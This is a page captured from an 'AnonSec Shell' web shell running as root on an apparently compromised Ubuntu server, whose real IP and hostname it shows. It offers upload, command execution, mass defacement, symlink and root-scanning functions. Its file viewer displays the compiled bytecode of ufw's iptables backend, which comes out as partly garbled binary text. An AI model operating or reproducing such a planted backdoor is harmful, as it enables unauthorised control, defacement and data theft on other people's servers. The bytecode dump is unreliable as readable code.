AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/ufw/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/ufw/__pycache__/backend_iptables.cpython-310.pyc
o

�Faj��@s�dZddlZddlZddlZddlZddlZddlZddlmZm	Z	ddl
mZmZm
Z
mZmZmZddlZGdd�dejj�ZdS)z-backend_iptables.py: iptables backend for ufw�N)�UFWError�UFWRule)�warn�debug�msg�cmd�cmd_pipe�	_findpathc@s�eZdZdZd+dd�Zdd�Zdd�Zd	d
�Zd,dd
�Zdd�Z	dd�Z
dd�Zdd�Zdd�Z
dd�Zdd�Zd-dd�Zd.dd �Zd!d"�Zd-d#d$�Zd%d&�Zd'd(�Zd)d*�ZdS)/�UFWBackendIptableszInstance class for UFWBackendNcCs�dtjjd|_||_||_i}ttjj|�}tj	�
|d�|d<tj	�
|d�|d<tj	�
|d�|d<tj	�
|d	�|d
<tj	�
|d�|d<tj	�
|d
�|d<tj	�
ttjj|�d�|d<tjj
j|d||||d�ggggd�|_dD]C}d}|dkr�|��r�||7}n|dkr�qsdD]}dD]}	d|||	f}
|j|�|
�q�q�|jd�|d�|jd�|d�qsgd�|_d|_dS) z!UFWBackendIptables initializationz# z
_comment #zufw/user.rules�ruleszufw/before.rules�before_ruleszufw/after.rules�after_ruleszufw/user6.rules�rules6zufw/before6.rules�
before6_ruleszufw/after6.rules�after6_ruleszufw-init�init�iptables)�rootdir�datadir)�before�user�after�misc)�4�6�ufwr)rrr��input�output�forwardz%s-%s-logging-%srz
-logging-denyz-logging-allow)�-m�limit�--limitz3/minute�-j�LOG�--log-prefixz[UFW LIMIT BLOCK]N)r�common�programName�comment_strrrr	�
config_dir�os�path�join�	state_dir�backend�
UFWBackend�__init__�chains�use_ipv6�append�ufw_user_limit_log�ufw_user_limit_log_text)�self�dryrunrr�filesr)�ver�chain_prefix�loc�target�chain�r>�6/usr/lib/python3/dist-packages/ufw/backend_iptables.pyr0 sD��
�

zUFWBackendIptables.__init__cCsbtd�}|jddkr|d7}|S|jddkr|d7}|S|jddkr+|d7}|S|d	7}|S)
zGet current policyz
New profiles:�default_application_policy�acceptz allow�dropz deny�rejectz rejectz skip)�_�defaults)r6�rstrr>r>r?�get_default_application_policyPs���z1UFWBackendIptables.get_default_application_policyc
	Cs|js�|dkr|dkr|dkrtd�|}t|��|dkr/|dkr/|dkr/td�|}t|��d	}|dkr8d
}n|dkr>d}d}d}|dkrbz|�|jd
d|d�Wnty\�wd}d}n;|dkr�z|�|jd
d|d�Wnty|�wd}d}nz|�|jd
d|d�Wnty��wd}d}t�d|�}|jd|jdfD]F}ztj	�
|�}	Wnty��w|	d}
|	dD]}|�|�r�tj	�|
|�
||��q�tj	�|
|�q�ztj	�|	�Wq�ty��wtd�||d�}|td�7}|S)zSets default policy of firewall�allow�denyrCzUnsupported policy '%s'�incoming�outgoing�routedz%Unsupported policy for direction '%s'�INPUT�OUTPUT�FORWARD�rEzDEFAULT_%s_POLICYz"ACCEPT"z	UFW BLOCKz	UFW ALLOWz"REJECT"z"DROP"r
r�tmp�origz5Default %(direction)s policy changed to '%(policy)s'
)�	direction�policyz*(be sure to update your rules accordingly))r7rDr�set_defaultr8�	Exception�re�compiler�util�
open_files�search�
write_to_file�sub�close_files)
r6rTrS�err_msgr=�old_log_str�new_log_str�pat�f�fns�fd�linerFr>r>r?�set_default_policy^s���������
��z%UFWBackendIptables.set_default_policycCs�|jrdtd�}|dtd�7}|S|��gd�}g}g}|dkr1|�d�gd�}gd�}n�|d	kr{d
D]}|�d|�|�d|�q7dD]}|�d
|�|�d
|�qJdD]}|�d|�|�d|�q]dD]	}|�d|�qpn�|dkr�dD]}|�d|�|�d|�q�n�|dkr�dD]}|�d|�|�d|�q�|jddr�|�d�|�d�|jddr�|�d�|�d�n`|d kr�dD]}|�d!|�|�d"|�q�nH|d#k�r-dD],}|�d$|�|�d%|�|�d&|�|�d'|�|�d(|�|�d)|�q�|�d*�|�d+�|�d,�|�d-�d.|}|D]H}d/|v�rW|�d/�\}	}|d0|	7}t|jg||d|	g�\}
}n
t|jg||g�\}
}||7}|dk�rq|d17}|
d2k�rzt|���q3|dk�s�|�	��r�|d37}|D]H}d/|v�r�|�d/�\}	}|d0|	7}t|jg||d|	g�\}
}n
t|j
g||g�\}
}||7}|dk�r�|d17}|
d2k�r�t|���q�|S)4z'Show current running status of firewall�> zChecking raw iptables
zChecking raw ip6tables
)�-nz-vz-x�-L�rawz-t)�filter�nat�manglerk)rlrnrk�builtins)rMrOrNz	filter:%s)�
PREROUTINGrMrOrN�POSTROUTINGz	mangle:%s)rprNzraw:%s)rprqrNznat:%sr)rrrz
ufw-before-%szufw6-before-%sr�ufw-user-%s�ufw6-user-%sr!rzufw-user-limit-accept�ufw-user-limitrzufw6-user-limit-accept�ufw6-user-limitrzufw-after-%sz
ufw6-after-%s�loggingzufw-before-logging-%szufw6-before-logging-%szufw-user-logging-%szufw6-user-logging-%szufw-after-logging-%szufw6-after-logging-%szufw-logging-allowzufw-logging-denyzufw6-logging-allowzufw6-logging-denyzIPV4 (%s):
�:z(%s) �
rz

IPV6:
)r7rD�initcapsr3�caps�splitrrrr2�	ip6tables)r6�
rules_type�out�args�items�items6�c�b�i�t�rcrQr>r>r?�get_running_raw�s�

��



��





 

�
 

�z"UFWBackendIptables.get_running_rawFc$Cs�d}|jrdtd�}|��r|dtd�7}|Std�}dD]@}t|jdd|d	g�\}}|d
kr8td�S|dkrDt|d
|��|��r_t|jdd|d	g�\}}|dkr_t|d��qd}d}	d}
|j|j}d
}i}
|D�]�}d}i}d}d}|s�|j	dks�|j
dkr�d}|��}||
vr�td|�qrd|
|<dD�]�}d||<d}d}|dkr�|j
}|s�|j	dkr�|j	}|jr�|dkr�|d7}n |j}n|j}|s�|j
dkr�|j
}|jr�|dkr�|d7}n|j}|dkr�|dkr�|||<|dk�r�||dk�r|||<n
||d|7<|�r#|jdk�r#||d|j7<|�r�|dk�rU|j	dk�rU||d|j	7<|j�rM|dk�rM||d7<||d7<|dk�r�|j
dk�r�||d|j
7<|j�r||dk�r|||d7<||d7<|dk�r�|dk�s�|dk�r�d||<|�r�|jdk�r�|j
|jk�r�|j|jk�r�||d|j7<|dk�r�||d7<n;|�r�|jdk�r�|j|jk�r�||d|j7<n|j�r|jdk�r|j
dk�rd||v�r||d7<|j�r3|dk�r|jdk�r||d|j7<|dk�r2|jdk�r2||d|j7<q�|dk�rI|jdk�rI||d|j7<|dk�r_|jdk�r_||d|j7<q�g}d}|j�sp|j��d k�r�|j�r||�|j���|�r�|jd k�r�|�|j�t|�dk�r�d!d"�|�}|�r�|d#|7}|j��}|j�r�d$}|jd%k�r�|j�s�|�s�|�s�d}d}|jdk�r�d&|��}|d'|dd�|j��|g�|d||f7}|�r�||7}n|j�r�|
|7}
n|jd k�r|	|7}	n||7}|d
7}qr|dk�s|	dk�s|
dk�r�d(}|�r!|d)7}td*�}td+�}td,�}d-}||||f}|�r=|d)7}||d.t|�d.t|�d.t|�f7}||7}|dk�r_||7}|dk�ro|	dk�ro|td/�7}|	dk�rx||	7}|dk�r�|
dk�r�|td/�7}|
dk�r�||
7}|}|�r�|� �\} }!td0�|�!�|�!d1�|�!d2d�d3�}"|�"�}#td4�|!|"|#|d5�Std6�|S)7zShow ufw managed rulesrPrhzChecking iptables
zChecking ip6tables
�problem runningrrjrrri�zStatus: inactiverz iptables: %s
rs�
 ip6tablesTFzSkipping found tuple '%s')�dst�srcr�z::/0� (v6)z	0.0.0.0/0�any� �/z (%s�)r��Anywherez on %sr~z (%s)z, z[%2d] �FWD�inz # %sz%-26s %-12s%-26s%s%s
z

z     �To�From�Actionz%-26s %-12s%s
�-rxzCDefault: %(in)s (incoming), %(out)s (outgoing), %(routed)s (routed)rr)r�r~rLz0Status: active
%(log)s
%(pol)s
%(app)s%(status)s)�log�pol�app�statuszStatus: active%s)#r7rDr2rrrr|rr�dapp�sapp�
get_app_tuplerr��v6�dportr��sport�protocolr�interface_in�
interface_out�logtyperS�lowerr3�lenr,�upper�comment�get_comment�action�get_loglevel�_get_default_policyrG)$r6�verbose�
show_countr~r_rSr��out6�s�str_out�str_rter�count�	app_rules�r�tmp_str�location�tupl�
show_protor;�portrQ�attribs�
attrib_str�dir_strr(�full_str�str_to�str_from�
str_action�rules_header_fmt�rules_header�level�logging_str�
policy_str�app_policy_strr>r>r?�
get_statussz
�
��

��



�� ��
��
��






��


�����zUFWBackendIptables.get_statuscCs�|jr
tdtd��dSg}|�|jd�|jdur7|jdur7|�d�|�|j�|�d�|�|j�|�d�t|�\}}|dkrPtd	|�}t|��dS)
zStop the firewallrh�running ufw-initrN�	--rootdir�	--datadirz
force-stopr�problem running ufw-init
%s)	r7rrDr3r8rrrr�r6rr�r~r_r>r>r?�
stop_firewall�s


�z UFWBackendIptables.stop_firewallcCs(|jr
tdtd��dSg}|�|jd�|jdur7|jdur7|�d�|�|j�|�d�|�|j�|�d�t|�\}}|dkrPtd	|�}t|��d
|j	vsa|j	d
t
|j���vryz|�
d�WdStyxtd�}t|��wz|�|j	d
�WdSty�td
�}t|��w)zStart the firewallrhr�rNr�r��startrr��loglevel�lowzCould not set LOGLEVELzCould not load logging rules)r7rrDr3r8rrrrrE�list�	loglevels�keys�set_loglevelrV�update_loggingr�r>r>r?�start_firewall�s8



��z!UFWBackendIptables.start_firewallcCs�|jrdS|��d}|j}|rd}|j}dD]7}|dks!|dkr5|r+|jdds+q|s5|jdds5qt|d	d
|d|g�\}}|dkrNtd
�dSqdS)zCheck if all chains existFr�ufw6)rrrr!�limit-acceptr!r�rrrirjz-user-rz_need_reload: forcing reloadT)r7ryrr|rzrr)r6r��prefix�exer=r�r~r>r>r?�_need_reloads(�zUFWBackendIptables._need_reloadcCs�td�}|jrtd�|��rtd�dSdS|��rwz|jdD]}|�|d|g�|�|d|g�q!Wnty@t|��wt	d|j
dg|jd	g�\}}|d
krZt|d��|��ryt	d|j
dg|jd	g�\}}|d
kr{t|d
��dSdSdS)zReload firewall rules filer�z> | iptables-restorez> | ip6tables-restorer�-F�-Z�catrrirz	 iptablesrr�N)
rDr7rr2�
is_enabledr1�
_chain_cmdrVrrr8�iptables_restore�ip6tables_restore)r6r_r�r�r~r>r>r?�_reload_user_rules:s:������z%UFWBackendIptables._reload_user_rulescCs8g}t�d�}t�d�}t�d�}|�|�rK|�|�rA|�|�r.|�|�d|�d|���n	|�|�d|��|�|�d|��n|�|�d|��n|�|�t�d�}t�d	�}	t�d
�}
d}t|�D]v\}}
|�|
�r�|�d|
���}|��d
krd}n|��dkr�d}nd}d||f}|	�|
�s�d|}|�d|
�||<|�||�d|d||
��|�||
�d|d||�d|
���|�||
�d|d||�d||
���qet�d�}t|�D]4\}}
|�|
��r|�d|
�}|�d|d|
�}|�d|d|
�}|||<|�||�|�||�q�|S) z5Return list of iptables rules appropriate for sendingz-p all zport z-j (REJECT(_log(-all)?)?)z-p tcp z-j \1 --reject-with tcp-resetz-p udp rPz(.*)-j ([A-Z]+)_log(-all)?(.*)z-j [A-Z]+_log-allz(-A|-D) ([a-zA-Z0-9\-]+)z'-m limit --limit 3/min --limit-burst 10�\2rA�ALLOWr!�LIMIT�BLOCKz"%s -j LOG --log-prefix "[UFW %s] "z-m conntrack --ctstate NEW z	\1-j \2\4z\1-j z-user-logging-z\1 z\1-j RETURN�\1z	 -j LIMITz+ -m conntrack --ctstate NEW -m recent --setzL -m conntrack --ctstate NEW -m recent --update --seconds 30 --hitcount 6 -j z-user-limitz -j z-user-limit-accept)	rWrXr[r3r]�	enumerate�stripr��insert)r6�fruler��suffix�snippets�	pat_proto�pat_port�
pat_reject�pat_log�
pat_logall�	pat_chain�
limit_argsr�r�rT�lstr�	pat_limit�tmp1�tmp2�tmp3r>r>r?�_get_rules_from_formattedVs�






��




�
�����������
�����z,UFWBackendIptables._get_rules_from_formattedc	Cs�g}|�|||�}t�d�}t|�D]8\}}|�|�d|����|�|�rJ||�d�||�|�d|��dd��|||�d|���7<q|S)z_Return list of iptables rules appropriate for sending as arguments
           to cmd()
        z(.*) --log-prefix (".* ")(.*)r�r%r��"rPz\3)	r�rWrXr�r3r]r{�match�replace)	r6r�r�r�r��str_snippetsrbr�r�r>r>r?�_get_lists_from_formatted�s

�z,UFWBackendIptables._get_lists_from_formattedcCs�|jdg}|��r|�|jd�|D�]�}ztj�|�}Wnty0td�|}t|��wt	�
d�}t	�
d�}t	�
d�}|D�]z}|}	d}
d|vrX|�d�\}	}|��}
|�
|	��r�|�d|	�}t	�d	|���}
t|
�d
ksxt|
�dkr�td�|}t|�qBd
}d}d}t|
�dks�t|
�dk�rtd�|}|
d�d�d}d|
dv�rd|
dvr�|�|
d�r�|�|
d�r�|
d�d�d�d�d}|
d�d�d�d�d}n'|
d�d�r�|
d�d�d}n|
d�d�r�|
d�d�d}nt|�qBz�|
d}d}d|v�rd}|�d�d}t|
�dk�r7t||
d|
d|
d|
d|
d|||
�	}n;t||
d|
d|
d|
d|
d|||
�	}t	�
d�}|
d
d k�rb|�d!|
d
�|_|
dd k�rr|�d!|
d�|_|dk�r}|�d
|�|dk�r�|�d"|�Wnt�y�td#�|}t|�YqBw||jdk�r�|�d�|j�|�qB|�d�|j�|�qB|��qd$S)%z$Read in rules that were added by ufwrrzCouldn't open '%s' for readingz^### tuple ###\s*zin_\w+zout_\w+rPz	 comment=z\s+��	z)Skipping malformed tuple (bad length): %sr��z$Skipping malformed tuple (iface): %s���rDr�!�r��in_�out_FrwT�����%20r�r�r~zSkipping malformed tuple: %sN)r8r2r3rrY�open_file_readrVrDrrWrXr{r�rr]r�rr[�	partition�
startswithrr�r��
set_interface�set_v6rr�close)r6�rfnsrcrRr_�	pat_tuple�pat_iface_in�
pat_iface_out�	orig_linerfr��hexr�rQ�wmsg�dtyper�r�r�r�rule�	pat_space�warn_msgr>r>r?�_read_rules�s�
�



������
��


���

�
�zUFWBackendIptables._read_rulescCs&|jd}|r|jd}t�|tj�std|�}t|��ztj�|�}Wnt	y-�w|�
�d}|j}|r>d}|j}|j
rGtj��}n|d}tj�|d�tj�|d|d	�tj�|d|d
�tj�|d|d�tj�|d|d�tj�|d|d
�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�|dkr�|jdd�s|dk�r|jdd�rtj�|d|d�tj�|d|d�tj�|d�|D�]	}|j}	|j�r3d|j}	|jdk�r@|	d|j7}	d}
|jdk�rR|jdk�rR|j}
n0|jdk�rg|jdk�rgd |j|jf}
n|jdk�rx|
d!|j|jf7}
n
|
d!|j|jf7}
|jdk�r�|jdk�r�d"|	|j|j|j|j|j|
f}|j dk�r�|d#|j 7}tj�||d$�nGt!�"d%�}d&}
|j�r�|�#d'|j�}
d&}|j�r�|�#d'|j�}d(|	|j|j|j|j|j|
||
f	}|j dk�r�|d#|j 7}tj�||d$�d)}|j�rd*}n|jd+k�r
d,}d-||f}d.||�$�f}|�%|||�D]
}tj�||��q"�q$tj�|d/�tj�|d0�z
|�&|j'd1�}Wn	t	�yP�w|D]2\}}}t(|�d2k�rh|d2d3k�rh�qS|�)|d&��r�tj�|d%�*|��+d4d5��+d6d7�d$��qStj�|d8�|dk�r�|jdd�s�|dk�r�|jdd�r�tj�|d9�|j'd1d:k�r�tj�|d;|d<d%�*|j,�d=|j-d>�tj�|d;|d?�tj�|d;|d@�tj�|dA�tj�|dB�z|j
�rtj�.|dC�WdDStj�.|�WdDSt	�y�w)Ez.Write out new rules to file to user chain filerrz'%s' is not writablerr�rQz*filter
rwz-user-input - [0:0]
z-user-output - [0:0]
z-user-forward - [0:0]
z-before-logging-input - [0:0]
z-before-logging-output - [0:0]
z -before-logging-forward - [0:0]
z-user-logging-input - [0:0]
z-user-logging-output - [0:0]
z-user-logging-forward - [0:0]
z-after-logging-input - [0:0]
z-after-logging-output - [0:0]
z-after-logging-forward - [0:0]
z-logging-deny - [0:0]
z-logging-allow - [0:0]
r!rrz-user-limit - [0:0]
z-user-limit-accept - [0:0]
z### RULES ###
zroute:rPrDzin_%s!out_%sz%s_%sz#
### tuple ### %s %s %s %s %s %s %sz comment=%srxr�r�rz)
### tuple ### %s %s %s %s %s %s %s %s %srrr~r�
%s-user-%sz	-A %s %s
z
### END RULES ###
z
### LOGGING ###
r�r�-D�[z"[z] z] "z### END LOGGING ###
z
### RATE LIMITING ###
�offz-A z-user-limit z "z "
z-user-limit -j REJECT
z-user-limit-accept -j ACCEPT
z### END RATE LIMITING ###
zCOMMIT
FN)/r8r*�access�W_OKrDrrrYrZrVryrrr7�sys�stdout�filenor\rzr�rr�r�r�rSr�r�r�r�r�r�r�r�rWrXr]�format_ruler��_get_logging_rulesrEr�rr,rr4r5r^)r6r��
rules_filer_rdr:rrer�r��ifaces�tstrr r�r��chain_suffixr=�rule_strr��lrules_tr��qr>r>r?�_write_rulessT

����������������

��
��������
��
�������zUFWBackendIptables._write_rulesTc	Csn|��d}|jr)|��std�}t|��|jdkr(|jdds(td�|jSn|jdkr<|jdds<td�|jS|jrQ|jdkrQ|jd	krQtd
�}t|��g}d}d}|j	}|j
}	|jrv|jdkrs|jdkso|j
dkrstd
�S|j}|	dks�|	t|�kr�td�|	}t|��|	dkr�|jr�td�}t|��|	t|�kr�td�|	}t|��z|��Wnty��wd}
d}d}d}
|D]�}z|��Wnty��w|j|j|j|j
f}|
|	k�r|
ddkr�|
ddkr�|
dk�s|ddk�r|ddk�s|
|k�rd}|�|���d}
n|	d7}	|}
|
d7}
t�||�}|dk�r+|d7}|dk�rD|�sD|�sDd}|j�sC|�|���q�|dk�rV|j�rV|jdk�rVd}q�|dk�rn|j�sn|�snd}d}|�|���q�|�|�q�|�r�|dk�r�td�}|j�r�|d7}|Sn?|�s�|j�s�|�|���|�s�|j�r�|j�s�td�}|j�r�|d7}|S|�r�|j�s�|�s�td�}|j�r�|d7}|S|j�r�||_n||_	z|�|j�Wnt�y��t�y�td�}t|�Ynwtd�}|j�rtd�}|���r5|j�s5d}|�s|�|j��s|�rPd}|�r(|td�7}n|td �7}|j�r6|d7}|�rIz|��WnRt�yH�w|td!�7}nB|�r�|j�r�d"}td#�}|j�re|d7}|�r{z|��Wn	t�yw�wd}n|td!�7}n|�s�|�s�|j�s�d$}td%�}|dk�r5|j}d&}|j�r�|j }d'}|d7}d(}|j!�r�d)}n|j"d*k�r�d+}d,||f}td-�}t#|d.|d/g�\}}|dk�r�t|��d0|||�$�f}t%�&d1�}|�'|||�D]H}t#|g|�\}}|dk�rt(|t)j*�t|�|d$k�r3|�+d2�,|���r3|�-d3d2�,|��}t#|d"|d4d5g�\}}|dk�r3t.d6|��q�|S)7aXUpdates firewall with rule by:
        * appending the rule to the chain if new rule and firewall enabled
        * deleting the rule from the chain if found and firewall enabled
        * inserting the rule if possible and firewall enabled
        * updating user rules file
        * reloading the user rules file if rule is modified
        rPz)Adding IPv6 rule failed: IPv6 not enabledr!rz#Skipping unsupported IPv6 '%s' rulerz#Skipping unsupported IPv4 '%s' rule�udp�tcpz/Must specify 'tcp' or 'udp' with multiple portsFz1.4z:Skipping IPv6 application rule. Need at least iptables 1.4rzInvalid position '%d'z Cannot specify insert and deletez#Cannot insert rule at position '%d'r�)rPrPrPrPr	r
T���z Skipping inserting existing ruler�z"Could not delete non-existent rulezSkipping adding existing rulezCouldn't update rules filez
Rules updatedzRules updated (v6)z
Rule insertedzRule updatedz (skipped reloading firewall)r$zRule deleted�-Az
Rule addedrr�rrr~rr#�!Could not update running firewallrjriz%s %s %sz(-A +)(ufw6?-user-[a-z\-]+)(.*)r�r�r#�RETURNzFAILOK: -D %s -j RETURN)/ryr�r2rDrr�rz�multir�r�position�iptables_versionr�r�rr��remove�	normalizerVr�r�r3�dup_rulerrr�r7r5r�r�r�rr|rrSrr,rWrXrrr)�stderrr[r,r]r)r6r�allow_reloadrFr_�newrules�found�modifiedrr=r��inserted�matches�lastr��current�ret�flagr�r:r1r=r�r~r2r�r�r�r>r>r?�set_rule�sZ
�
��
"

�
����


�

�zUFWBackendIptables.set_rulec
Cstg}g}|r
|j}n|j}|��}|�|�|��|��}|D]}|��}|��|��}	|	|kr7|�|�q |S)z@Return a list of UFWRules from the system based on template rule)rrrArr@r�r3)
r6�templater�rr��normr�r�rQ�	tmp_tupler>r>r?�get_app_rules_from_system�s"

�z,UFWBackendIptables.get_app_rules_from_systemcCs\|j}|�d�r|j}t|g|�\}}|dkr,td|�}|r(td|�dSt|��dS)zPerform command on chainr�rzCould not perform '%s'zFAILOK: N)rrr|rrDrr)r6r=r�fail_okr�r�r~r_r>r>r?r��s
�zUFWBackendIptables._chain_cmdc		Csx|jrdS|��g}z|�|�}Wnty�wz|jdd�|jdd�Wnty1�tyAtd�}t|�Ynw|��sHdStd�}|jd|jd|jd	|jd
D]}z|�	|d|dg�Wq`tyxt|��wz$|jd|jd	|jd
D]}|�	|d
|g�|�	|d|g�q�Wnty�t|��w|D]B\}}}d}t
|�dkr�|ddkr�d}z"|dkr�t
|�dkr�|j	|dg|dd�dd�|�	|||�Wq�ty�t|��wdD]I}|jddr�|dk�s|jdd�r9|dk�r9|j	|d|g|j|j
dgdd�|jddk�r9|j	|d|g|j|j
dgdd�q�dS)z#Update loglevel of running firewallNF)r�Tz&Couldn't update rules file for loggingr:rrrrrjrir�r�rr$�delete_firstr�)rR)rtrur!rrtrrur�r�r&�-I)r7ryr-rVr5rrDr�r1r�r�rzr4r5rE)	r6r��rules_tr_r�r�r4rRr=r>r>r?r��s�����������
�
���
����z!UFWBackendIptables.update_loggingc	Cs�g}|t|j���vrtd�|}t|��|dkr/|jdD]}|�|d|ddgdg�q|S|jdD]}|�|d|ddgd	g�q4gd
�}|j||jdk�rg}|j||jdkr`|}|jd
D]I}dD]D}|�|�r�|�|�dks~|�|�dkr�d}|�|d|ddd|g|d	g�qi|j||jdkr�d}|�|d|ddd|g|d	g�qiqeg}|j||jdkr�|}|jdD]S}|�d�r�d}n9|�d��rd}|j||jdkr�|�|d|ddddddg|d	g�n|�|d|ddddddddg
|d	g�|�|d|ddd|g|d	g�q�|j||jdk�r\g}|j||jdk�r0|}|j||jdk�rAgd�|}d }|jd!D]}|�|d|ddd|g|d	g��qH|S)"z%Get rules for specified logging levelzInvalid log level '%s'r&rrTr#r;rSr$rP)r r!r"z3/minz
--limit-burst�10r��highrrrCrIz[UFW BLOCK] r9r$r%�mediumz[UFW ALLOW] rrHr �	conntrack�	--ctstate�INVALIDz[UFW AUDIT INVALID] �full)r rYrZ�NEWz[UFW AUDIT] r)	r�r�r�rDrr1r3�endswithr�)	r6r�rUr_r�r��largsr�r�r>r>r?r-s�
��������
�����������
�z%UFWBackendIptables._get_logging_rulesc
Cs�d}ttjj|j�}g}|jD]2}|j|�d�sq|�|j|�tj	�
|dtj	�|j|��}tj	�|�sAt
d�|}t|��qt�d�}|D]}d||f}tj	�|�rat
d�|}t|��qI|D]}d||f}|t
d�tj	�|�|d	�7}t�||�qd|D]]}d||f}t�tj	�
|dtj	�|��tj	�|��t�||�zt�|�}	|	tj}
Wnty�t
d
�|}t|�Yq�w|
tj@r�|t
d�|7}q�|
tj@r�|t
d�|7}q�|S)
zReset the firewallrPz.rulesrzCould not find '%s'. Abortingz
%Y%m%d_%H%M%Sz%s.%sz'%s' already exists. Abortingz"Backing up '%(old)s' to '%(new)s'
)�old�newzCouldn't stat '%s'zWARN: '%s' is world writablezWARN: '%s' is world readable)r	rr&�	share_dirrr8r^r3r*r+r,�basename�isfilerDr�time�strftime�exists�rename�shutil�copy�dirname�copymode�stat�ST_MODErVr�S_IWOTH�S_IROTH)r6�resrb�allfilesr��fnr_�extr`�statinfo�moder!r>r>r?�resetksb

��
��
�
�
�

�zUFWBackendIptables.reset)NN)FF)F)T)�__name__�
__module__�__qualname__�__doc__r0rGrgr�r�r�r�r�r�r�rr"r5rMrQr�r�r-rwr>r>r>r?r
s0
0K
]f!D
e
*i

JZr
)r{r*rWrirmr)re�
ufw.commonrr�ufw.utilrrrrrr	�ufw.backendrr.r/r
r>r>r>r?�<module>s 

Anon7 - 2022
AnonSec Team